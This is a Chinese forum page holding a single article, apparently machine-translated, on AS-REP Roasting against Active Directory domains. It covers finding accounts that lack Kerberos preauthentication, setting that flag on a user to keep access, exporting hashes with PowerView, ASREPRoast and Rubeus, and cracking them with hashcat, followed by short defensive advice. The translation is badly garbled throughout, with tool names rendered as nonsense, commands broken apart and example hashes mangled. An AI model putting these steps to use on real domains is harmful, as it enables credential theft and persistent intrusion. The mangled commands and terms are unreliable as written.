搜索论坛
显示结果为标签'REPRoasting'。
找到1个结果
-
0x00 前言 砷焙烧同Kerberoasting类似,如果满足条件,就能够获得用户口令的哈希,再结合哈希卡特进行破解,最后能够还原出用户的明文口令。 本文将要参考公开资料,结合自己的理解,介绍砷焙烧的利用方法,最后给出防御建议。 0x01 简介 本文将要介绍以下内容: 砷焙烧的原理 砷焙烧的利用条件 砷焙烧的利用方法 破解混杂的方法 防御建议 0x02 AS-REP Roasting 1.简介 对于域用户,如果设置了选项"不需要麻省理工学院开发的安全认证系统预身份验证",此时向域控制器的88端口发送按要求请求,对收到的组件代表内容重新组合,能够拼接成" Kerberos 5 AS-REP etype 23"(18200)的格式,接下来可以使用哈希卡特对其破解,最终获得该用户的明文口令 2.利用前提 域用户设置了选项"不需要麻省理工学院开发的安全认证系统预身份验证" 通常情况下,该选项默认不会开启 3.利用思路 通常在域渗透中用来维持权限 需要先获得对指定用户的泛型写入权限,利用思路如下: 开启用户选项"不需要麻省理工学院开发的安全认证系统预身份验证" 导出混杂并破解 关闭用户选项"不需要麻省理工学院开发的安全认证系统预身份验证" 0x03 AS-REP Roasting的利用方法 1.寻找满足条件的用户 用户需要开启选项"不需要麻省理工学院开发的安全认证系统预身份验证" 这里可以使用轻量级目录访问协议查询满足条件(用户帐户控制:1 .2 .840 .113556 .1 .4 .803:=4194304)的用户 参考资料: https://支持。微软。如何使用用户帐户控制来操作用户帐户属性 https://github。com/powershell mafia/PowerSploit/blob/445 f7b 2510 c 4553 DCD 9451 BC 4 da CCB 20 c 8 e 67 cbb/Recon/power view。PS1 # l 4769 DONT _请求_预先授权项对应的值为4194304 PowerView的命令如下: 导入模块. PowerView.ps1 get-domain user-PreauthNotRequired-Verbose 示例如下图 只显示distinguishedname项: 导入模块. PowerView.ps1 get-domain user-PreauthNotRequired-Properties可分辨名称-Verbose 示例如下图 2.开启和关闭选项”Do not require Kerberos preauthentication” 开启选项意味着对用户添加属性(用户帐户控制=4194304) 开启选项的命令如下: 导入模块. PowerView.ps1 set-domain object-Identity test b-XOR @ {用户帐户控制=4194304 }-Verbose 关闭选项意味着删除用户属性(用户帐户控制=4194304) 注: 这里可以再次进行异或运算,两次异或相当于不改变原数值,即删除用户属性(用户帐户控制) 关闭选项的命令如下: 导入模块. PowerView.ps1 set-domain object-Identity test b-XOR @ {用户帐户控制=4194304 }-Verbose 3.导出hash (1)使用Powershell https://github.com/HarmJ0y/ASREPRoast 导出所有可用用户混杂的命令如下: 导入模块\ASREPRoast.ps1 Invoke-ASREPRoast -Verbose |fl 示例如下图 导出指定用户混杂的命令如下: get-as repash-UserName测试b-Verbose 示例如下图 提取出哈希: $ krb 5作为代表$ testb @ test。com:a 128092441 a 3 af 80015554 db 2 f 3 Fe 44 e $ d 69 b 44 c 7d 9 cf 36261 a 012d 012 f 636 a 2124837 af 89 a 48 ef 686 E1 AC 7572 af 93741 fc 80142343 a 85 c 9 aa CD 6 a5 f 85 f1 d 840d 07 b 09 e 68795 ce (2)使用C#(Rubeus) https://github.com/GhostPack/Rubeus 命令如下: Rubeus.exe阿斯普罗斯特 示例如下图 4.使用hashcat进行破解 提取出哈希: $ krb5 ASR EP $ test @ test。com:a 128092441 a 3 af 800015554 db 2 F3 fe44 e $ d69b 44 c 7 d9 cf 36261 a 012d 012 f 636 a 214748368 af 89 a 48 ef 686 e 1 AC 7572 af 93741 fc 8001423443 a 85 C9 aacd 6 a 5f 85 f1 d 840d 07 b 09 e 6877 拼接成哈希猫能够识别的格式需要在$krb5asrep后面添加23块钱 哈希猫使用字典破解的参数如下: hashcat-m 18200 ' $ krb5 ASR EP $ 23 $ test @ test。com:a 128092441 a 3af 800015554 db 2 F3 fe44 e $ d69b 44 c 7 d9 cf 36261 a 012d 012 f 636 a 212248837 af 89 a 48 ef 686 e 1 AC 7572 af 93741 fc 800142344 a 85 C9 aacd 6 a 5f 85 f1 d 840 d07b 09 e 68795 参数说明: /usr/share/john/password.lst文件为字典文件的位置 -或found.txt表示输出结果的位置 0x04 防御建议 1.确保域内不存在开启"不要求麻省理工学院开发的安全认证系统预先验证"的用户 扫描方法(使用PowerView: 导入模块. PowerView.ps1 get-domain user-pre authenticated-verbose-取得网域使用者-预先验证我们的平衡-动词 2.域用户强制使用复杂口令,提高被字典和暴力破解的难度 0x05 小结 本文介绍了as-rep咆哮(代表咆哮)在域渗透中的利用条件和方法,给出防御建议 留下一个答案
